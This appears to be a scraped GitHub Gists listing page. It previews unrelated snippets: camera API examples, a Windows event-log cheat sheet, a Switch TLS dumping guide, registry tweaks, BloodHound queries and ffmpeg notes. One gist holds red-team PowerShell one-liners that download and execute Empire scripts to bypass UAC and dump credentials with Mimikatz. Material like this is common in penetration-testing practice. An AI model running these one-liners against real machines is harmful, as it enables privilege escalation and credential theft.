Skip to content

Instantly share code, notes, and snippets.

View freeload101's full-sized avatar
💭
̷̢̛̬̤̼̬̠̝̳̮͈͍̞͔̼̮̠̫͈̟̙̱̦̦̘̖̹͈̬͇͉͙̣̯̩̫̙̫͓͈̦̋͆̒͂͂̆͊͛͛͑̋́̔̀̀͗͂̏̇͋̑̓̅͆́͘͜͜͝͠

Robert McCurdy freeload101

💭
̷̢̛̬̤̼̬̠̝̳̮͈͍̞͔̼̮̠̫͈̟̙̱̦̦̘̖̹͈̬͇͉͙̣̯̩̫̙̫͓͈̦̋͆̒͂͂̆͊͛͛͑̋́̔̀̀͗͂̏̇͋̑̓̅͆́͘͜͜͝͠
View GitHub Profile
@jasonk
jasonk / Reolink API.md
Last active April 21, 2024 14:18
Simple Bash Examples for Reolink API
@githubfoam
githubfoam / windows event logs cheat sheet
Last active April 20, 2024 09:42
windows event logs cheat sheet
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# PS : ChatGPT makes mistakes, consider "trust but verify" principle
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#Events to Monitor
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#run
eventvwr.msc Event viewer
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Event Viewer(Local)-Windows Logs (shutdown / restart )

Switch TLS Dumping Guide (Charles)

This guide is for dumping Switch TLS traffic using the Charles web proxy. Please note that this is paid software.

Most Switch communications are over TLS - this includes NEX and Eagle communications (for Nintendo Switch Online)* as well as other servers such as BAAS (friends/status) and NPNS (notifications)

*NPLN, the new Switch online servers that Monster Hunter Rise demo used, cannot be dumped with Charles currently as it doesn't support gRPC - use grpc-dump to dump these communications - the gPRC section will explain this better.

While this doesn't carry much risk in theory, this is risky and could get your Switch banned as you must send your own Switch-unique client certificate.

Dumping Console-Unique Certificate

@Carm01
Carm01 / Annoyances_Tweaks.cmd
Last active November 13, 2022 05:22
bat file commands to apply to a machine designed to replace the sysprep Aufit Mode / Copy Profile methodology. This provides a consistant and efficient way to apply user settings without manually doing it for all users. You can pick and choose which settings you want and do not want
:: https://stealthpuppy.com/customize-the-windows-default-profile/#.XEfajs17mUm
:: https://helgeklein.com/blog/2011/12/customizing-the-default-profile/
:: https://www.reddit.com/r/PowerShell/comments/8rupxv/unloading_registry_hive_with_a_script/
:: https://blogs.technet.microsoft.com/deploymentguys/2009/10/29/configuring-default-user-settings-full-update-for-windows-7-and-windows-server-2008-r2/
:: remove the double colon to activate the code if it is commented out
:: disable Cortana
:: https://www.addictivetips.com/windows-tips/disable-web-search-windows-10-april-update/
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortana" /d 0 /t REG_DWORD /f
:: 5/9/2019
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "DisableWebSearch" /d 1 /t REG_DWORD /f
@seajaysec
seajaysec / customqueries.json
Last active April 2, 2024 19:25
bloodhound custom queries
{
"queries": [{
"name": "List all owned users",
"queryList": [{
"final": true,
"query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
}]
},
{
"name": "List all owned computers",
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@protrolium
protrolium / ffmpeg.md
Last active April 8, 2024 11:49
ffmpeg guide

ffmpeg

Converting Audio into Different Formats / Sample Rates

Minimal example: transcode from MP3 to WMA:
ffmpeg -i input.mp3 output.wma

You can get the list of supported formats with:
ffmpeg -formats

You can get the list of installed codecs with: